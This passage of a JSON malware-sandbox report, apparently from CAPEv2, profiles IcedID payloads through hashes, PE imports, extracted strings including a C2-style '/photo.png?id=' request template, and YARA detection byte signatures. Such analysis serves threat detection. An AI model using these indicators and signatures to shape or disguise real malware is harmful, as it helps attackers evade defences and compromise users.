"cd611f4aa43b076f84a8d1e70c9f4e12", + "sha1": "d10f4fa507d32fdb9a3826e48f14c52e95be11aa", + "sha256": "3436060c070f5e6ab9552f7a42d68e8c0cb0f08e8545237e5ba1d435103e636c", + "sha512": "7747b655c14f209d1c535feda4f8c4e3ffcaad0d363d12b2857cbe709034dbcf3e4ed335bc4bd978d83164e34e886aada6d1cc62bcf6bfb40930fb299411d45b", + "rh_hash": null, + "ssdeep": "96:MMqEESUUhDYXAybZACN3fICtECLi0/rlDXLeFX:MMqr7UhcXAybZBrWwxDbG", + "type": "PE32 executable (GUI) Intel 80386, for MS Windows", + "yara": [], + "cape_yara": [ + { + "name": "IcedID", + "meta": { + "author": "kevoreilly, threathive", + "description": "IcedID Payload", + "cape_type": "IcedID Payload" + }, + "strings": [ + "{ 8D 44 24 40 50 8D 84 24 44 03 00 00 68 04 21 40 00 50 FF D5 8D 84 24 4C 01 00 00 C7 44 24 28 01 00 00 00 89 44 24 1C 8D 4C 24 1C 8D 84 24 4C 03 00 00 83 C4 0C 89 44 24 14 8B D3 B8 BB 01 00 00 66 89 44 24 18 57 }", + "id=", + ".png" + ], + "addresses": { + "download1": 1756, + "stage_2_request_binary": 3815, + "stage_2_request_img": 3810 + } + } + ], + "clamav": [], + "tlsh": "T124D10993BD54A8B0F7CB44744E59212EE3F76915273014F389F358CAAAA2E99787D320", + "sha3_384": "82d2793fe2a13d0cf36f210582de845a76144b4e8c388a9e3b01f0c403a1bd96ae4f2c23d8f8465001b7b1e5909f6258", + "pe": { + "guest_signers": { + "aux_sha1": null, + "aux_timestamp": null, + "aux_valid": false, + "aux_error": true, + "aux_error_desc": "No signature found.", + "aux_signers": [] + }, + "digital_signers": [], + "imagebase": "0x00400000", + "entrypoint": "0x0000163d", + "ep_bytes": "e8b7feffff6a00ff150c204000cc83ec", + "peid_signatures": null, + "reported_checksum": "0x00000000", + "actual_checksum": "0x00006959", + "osversion": "5.1", + "pdbpath": null, + "imports": { + "ADVAPI32": { + "dll": "ADVAPI32.dll", + "imports": [ + { + "address": "0x402000", + "name": "GetUserNameA" + } + ] + }, + "SHELL32": { + "dll": "SHELL32.dll", + "imports": [ + { + "address": "0x402054", + "name": "SHGetFolderPathA" + } + ] + }, + "KERNEL32": { + "dll": "KERNEL32.dll", + "imports": [ + { + "address": "0x402008", + "name": "lstrcpyA" + }, + { + "address": "0x40200c", + "name": "ExitProcess" + }, + { + "address": "0x402010", + "name": "CreateDirectoryA" + }, + { + "address": "0x402014", + "name": "lstrcatA" + }, + { + "address": "0x402018", + "name": "Sleep" + }, + { + "address": "0x40201c", + "name": "lstrlenA" + }, + { + "address": "0x402020", + "name": "ReadFile" + }, + { + "address": "0x402024", + "name": "HeapFree" + }, + { + "address": "0x402028", + "name": "WriteFile" + }, + { + "address": "0x40202c", + "name": "CreateFileA" + }, + { + "address": "0x402030", + "name": "CloseHandle" + }, + { + "address": "0x402034", + "name": "HeapAlloc" + }, + { + "address": "0x402038", + "name": "GetFileSize" + }, + { + "address": "0x40203c", + "name": "GetProcessHeap" + }, + { + "address": "0x402040", + "name": "GetModuleFileNameA" + }, + { + "address": "0x402044", + "name": "VirtualProtect" + }, + { + "address": "0x402048", + "name": "VirtualAlloc" + }, + { + "address": "0x40204c", + "name": "HeapReAlloc" + } + ] + }, + "WINHTTP": { + "dll": "WINHTTP.dll", + "imports": [ + { + "address": "0x402068", + "name": "WinHttpCloseHandle" + }, + { + "address": "0x40206c", + "name": "WinHttpSetOption" + }, + { + "address": "0x402070", + "name": "WinHttpOpenRequest" + }, + { + "address": "0x402074", + "name": "WinHttpSendRequest" + }, + { + "address": "0x402078", + "name": "WinHttpQueryHeaders" + }, + { + "address": "0x40207c", + "name": "WinHttpOpen" + }, + { + "address": "0x402080", + "name": "WinHttpReceiveResponse" + }, + { + "address": "0x402084", + "name": "WinHttpQueryDataAvailable" + }, + { + "address": "0x402088", + "name": "WinHttpConnect" + }, + { + "address": "0x40208c", + "name": "WinHttpReadData" + } + ] + }, + "USER32": { + "dll": "USER32.dll", + "imports": [ + { + "address": "0x40205c", + "name": "wsprintfA" + }, + { + "address": "0x402060", + "name": "wsprintfW" + } + ] + } + }, + "exported_dll_name": null, + "exports": [], + "dirents": [ + { + "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", + "virtual_address": "0x0000210c", + "size": "0x00000078" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", + "virtual_address": "0x00004000", + "size": "0x0000008c" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_TLS", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_IAT", + "virtual_address": "0x00002000", + "size": "0x00000094" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", + "virtual_address": "0x00000000", + "size": "0x00000000" + } + ], + "sections": [ + { + "name": ".text", + "raw_address": "0x00000400", + "virtual_address": "0x00001000", + "virtual_size": "0x00000932", + "size_of_data": "0x00000a00", + "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x60000020", + "entropy": "6.04" + }, + { + "name": ".rdata", + "raw_address": "0x00000e00", + "virtual_address": "0x00002000", + "virtual_size": "0x00000468", + "size_of_data": "0x00000600", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x40000040", + "entropy": "3.93" + }, + { + "name": ".data", + "raw_address": "0x00001400", + "virtual_address": "0x00003000", + "virtual_size": "0x00000250", + "size_of_data": "0x00000400", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", + "characteristics_raw": "0xc0000040", + "entropy": "5.40" + }, + { + "name": ".reloc", + "raw_address": "0x00001800", + "virtual_address": "0x00004000", + "virtual_size": "0x0000008c", + "size_of_data": "0x00000200", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x42000040", + "entropy": "2.17" + } + ], + "overlay": null, + "resources": [], + "versioninfo": [], + "imphash": "0e18f33408be6e4cb217f0266066c51c", + "timestamp": "2019-10-08 12:34:43", + "icon": null, + "icon_hash": null, + "icon_fuzzy": null, + "icon_dhash": null, + "imported_dll_count": 5 + }, + "data": null, + "strings": [ + "7:7R7z7", + "KERNEL32.dll", + "ReadFile", + "WinHttpSendRequest", + "WinHttpCloseHandle", + "\"fAnS", + "WinHttpConnect", + "-bLvY", + "WinHttpReceiveResponse", + "D$0QQQ", + "Xd5pS", + "WinHttpOpenRequest", + "SSSSSSW", + "/photo.png?id=%0.2X%0.8X%0.8X%s", + "0,0@0G0_0~0", + "4J4e4{4", + "5F6t6", + "%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.8X", + "WinHttpReadData", + "lstrcpyA", + "VirtualAlloc", + "QSVW3", + "ExitProcess", + ".reloc", + "WinHttpSetOption", + "WinHttpOpen", + "wsprintfW", + "Sleep", + "c:\\Users\\Public\\", + "_@^][", + "WINHTTP.dll", + "CreateFileA", + "GetFileSize", + "USER32.dll", + "HeapReAlloc", + "~WIDAT", + "CreateDirectoryA", + "lstrcatA", + "QQSUV", + "GetProcessHeap", + "|$(@3", + "$_^][", + "D$3Ph", + "QSUVW3", + "GetModuleFileNameA", + "lstrlenA", + "WinHttpQueryDataAvailable", + "2K2V2]2o2u2z2", + "5!50575K5Z5h5m5{5", + "WriteFile", + "wsprintfA", + "t>@PQ", + "^][YY", + "`.rdata", + "_^][Y", + ".text", + "ADVAPI32.dll", + "VirtualProtect", + "WinHttpQueryHeaders", + "HeapFree", + "SHELL32.dll", + "@.data", + "GetUserNameA", + "SHGetFolderPathA", + "\\photo.png", + "_^][YY", + "!This program cannot be run in DOS mode.", + "tQ@Pj", + "CloseHandle", + "HeapAlloc" + ], + "virustotal": { + "error": true, + "msg": "Unable to complete connection to VirusTotal. Status code: 429" + }, + "cape_type_code": 8, + "cape_type": "IcedID Payload: 32-bit executable", + "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe", + "process_name": "0b15348fb954e0b4331e.exe", + "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe", + "pid": 9448, + "virtual_address": "0x02290000" + }, + { + "name": "c2c70e2f50bba807bb47feaabbe39c15202dc663bc5448ad4a82d537f33a5711", + "path": "/opt/CAPEv2/storage/analyses/3941/CAPE/c2c70e2f50bba807bb47feaabbe39c15202dc663bc5448ad4a82d537f33a5711", + "guest_paths": "9;?C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe;?0x02280000;?", + "size": 2016, + "crc32": "037004FD", + "md5": "c448beaeb45adaa852bd5c8ab354ba8b", + "sha1": "0cc85c735293f0a38179985356fa09d4c6ac4a5e", + "sha256": "c2c70e2f50bba807bb47feaabbe39c15202dc663bc5448ad4a82d537f33a5711", + "sha512": "cf032d6120f50bdf14c89e549fe613641ad5bec452c49087edda89303bd6b985eaa6774810e34ea6f5ed55de5677dae97ae4428a1253983d5d1330d1a740fd75", + "rh_hash": null, + "ssdeep": "48:K6UtlgSTv67kn3mJTXw22p/dqV9PMGoqC0M4F0+K/S:stmSTv6oGDad6UtqCWLWS", + "type": "data", + "yara": [ + { + "name": "shellcode_stack_strings", + "meta": { + "author": "William Ballenthin", + "email": "william.ballenthin@fireeye.com", + "license": "Apache 2.0", + "copyright": "FireEye, Inc", + "description": "Match x86 that appears to be stack string creation." + }, + "strings": [ + "{ C6 45 A0 43 C6 45 A1 72 C6 45 A2 79 C6 45 A3 70 C6 45 A4 74 C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 A1 72 C6 45 A2 79 C6 45 A3 70 C6 45 A4 74 C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 A2 79 C6 45 A3 70 C6 45 A4 74 C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 A3 70 C6 45 A4 74 C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 A4 74 C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }", + "{ C6 45 B8 43 C6 45 B9 72 C6 45 BA 79 C6 45 BB 70 C6 45 BC 74 C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 B9 72 C6 45 BA 79 C6 45 BB 70 C6 45 BC 74 C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 BA 79 C6 45 BB 70 C6 45 BC 74 C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 BB 70 C6 45 BC 74 C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 BC 74 C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }", + "{ C6 45 D8 43 C6 45 D9 72 C6 45 DA 79 C6 45 DB 70 C6 45 DC 74 C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }", + "{ C6 45 D9 72 C6 45 DA 79 C6 45 DB 70 C6 45 DC 74 C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }", + "{ C6 45 DA 79 C6 45 DB 70 C6 45 DC 74 C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }", + "{ C6 45 DB 70 C6 45 DC 74 C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }", + "{ C6 45 DC 74 C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }", + "{ C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }", + "{ C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }", + "{ C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }", + "{ C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }", + "{ C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }", + "{ C6 45 C8 43 C6 45 C9 72 C6 45 CA 79 C6 45 CB 70 C6 45 CC 74 C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 C9 72 C6 45 CA 79 C6 45 CB 70 C6 45 CC 74 C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 CA 79 C6 45 CB 70 C6 45 CC 74 C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 CB 70 C6 45 CC 74 C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 CC 74 C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }", + "{ C6 45 E8 43 C6 45 E9 72 C6 45 EA 79 C6 45 EB 70 C6 45 EC 74 C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }", + "{ C6 45 E9 72 C6 45 EA 79 C6 45 EB 70 C6 45 EC 74 C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }", + "{ C6 45 EA 79 C6 45 EB 70 C6 45 EC 74 C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }", + "{ C6 45 EB 70 C6 45 EC 74 C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }", + "{ C6 45 EC 74 C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }", + "{ C6 45 ED 45 C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }", + "{ C6 45 EE 6E C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }", + "{ C6 45 EF 63 C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }", + "{ C6 45 F0 72 C6 45 F1 79 C6 45 F2 70 C6 45 F3 74 C6 45 F4 00 }", + "{ C6 45 C8 52 C6 45 C9 74 C6 45 CA 6C C6 45 CB 49 C6 45 CC 6E C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 C9 74 C6 45 CA 6C C6 45 CB 49 C6 45 CC 6E C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 CA 6C C6 45 CB 49 C6 45 CC 6E C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 CB 49 C6 45 CC 6E C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 CC 6E C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 CD 69 C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 CE 74 C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 CF 55 C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 D0 6E C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 D1 69 C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 D2 63 C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 D3 6F C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 D4 64 C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 D5 65 C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 D6 53 C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 D7 74 C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 D8 72 C6 45 D9 69 C6 45 DA 6E C6 45 DB 67 C6 45 DC 00 }", + "{ C6 45 E0 4C C6 45 E1 64 C6 45 E2 72 C6 45 E3 4C C6 45 E4 6F C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }", + "{ C6 45 E1 64 C6 45 E2 72 C6 45 E3 4C C6 45 E4 6F C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }", + "{ C6 45 E2 72 C6 45 E3 4C C6 45 E4 6F C6 45 E5 61 C6 45 E6 64 C6 45 E7 44 C6 45 E8 6C C6 45 E9 6C C6 45 EA 00 }", + "{ C6 45 E3 4C C6 45 E4 